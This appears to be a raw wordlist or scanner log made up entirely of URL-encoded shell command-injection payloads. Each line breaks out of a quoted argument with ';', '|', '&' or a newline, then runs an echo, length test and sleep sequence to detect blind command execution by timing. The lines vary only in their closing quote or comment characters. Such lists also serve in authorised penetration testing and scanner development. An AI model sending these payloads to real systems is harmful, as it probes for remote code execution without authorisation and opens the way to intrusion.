+%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%27%7C%20%5B%201%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%27%7C%20%5B%202%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%27%7C%20%5B%203%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%27%7C%20%5B%204%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%27%7C%20%5B%205%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%27%7C%20%5B%206%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%27%7C%20%5B%207%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%27%7C%20%5B%208%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%27%7C%20%5B%209%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%27%7C%20%5B%201%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%27%7C%20%5B%202%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%27%7C%20%5B%203%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%27%7C%20%5B%204%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%27%7C%20%5B%205%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%27%7C%20%5B%206%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%27%7C%20%5B%207%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%27%7C%20%5B%208%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%27%7C%20%5B%209%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%27%7C%20%5B%201%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%27%7C%20%5B%202%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%27%7C%20%5B%203%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%27%7C%20%5B%204%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%27%7C%20%5B%205%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%27%7C%20%5B%206%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%27%7C%20%5B%207%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%27%7C%20%5B%208%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%27%7C%20%5B%209%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%27%7C%20%5B%201%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%27%7C%20%5B%202%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%27%7C%20%5B%203%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%27%7C%20%5B%204%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%27%7C%20%5B%205%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%27%7C%20%5B%206%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%27%7C%20%5B%207%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%27%7C%20%5B%208%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%27%7C%20%5B%209%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// 